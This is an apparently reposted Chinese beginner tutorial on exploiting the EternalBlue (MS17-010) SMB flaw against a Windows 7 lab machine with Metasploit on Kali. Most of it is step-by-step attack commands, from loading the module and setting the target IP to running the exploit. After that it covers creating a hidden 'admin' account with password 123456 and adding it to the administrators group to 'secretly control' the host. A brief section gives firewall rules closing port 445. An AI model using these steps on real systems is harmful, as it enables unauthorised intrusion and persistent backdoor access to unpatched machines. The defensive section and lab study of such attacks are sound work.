利用永恒之蓝渗透win7 (低配版)


利用永恒之蓝渗透win7 (低配版)

环境:

攻击机: kali linux2.0系统

https://www.kali.org/downloads/)

 机: window7(链接:http://pan.baidu.com/s/1jIzOqRc 密码:vz8p)

window server 2008

 洞:永恒之蓝

步骤:

(这里实际操作时,我会用ssh远程连接kali 操作,ssh的使用就不介绍了,自己搜)

 

第一步:打开metasploit

命令:root@kali:~# msfconsole

 

第二步:

使用永恒之蓝模块,

命令:

root@kali:~# search ms17-01

root@kali:~# use

 

 

第三步:

填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改

命令:

root@kali:~# show options

root@kali:~# set RHOST 172.19.120.68

 

 

第四步:

攻击

命令:

root@kali:~# exploit       或者run

 

 

 

显示以及拿到靶机的控制权,

 

第五步:

创建新用户,偷偷的控制使用,

命令:

net user admin 123456 /add

 

第六步:

提权,将新创建的用户admin提到管理员权限

命令:

net localgroup administrators admin /add

 

 

查看权限:

net user admin

 

第六步:

远程连接 admin 用户

 

 

 

 

 

渗透成功,接下来你就可以做你想做的了。

 

防御办法:

1,网上下载补丁,

2,关闭445端口,dos命令:

netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block

netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445

检测445端口是否开启:

netstat -ano -p tcp | find “445”

 

 

总结:

实验过程遇到好多问题,解决办法:先自己各种尝试,在上网搜相关知识,最后还不会,就去请教大神。

另外这个实验比较简单,局限性较大,可以作为入门使用,网上好像有永恒之蓝漏洞的复现,使用python 来做的,暂时还不太懂,等有机会自己也去尝试尝试。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM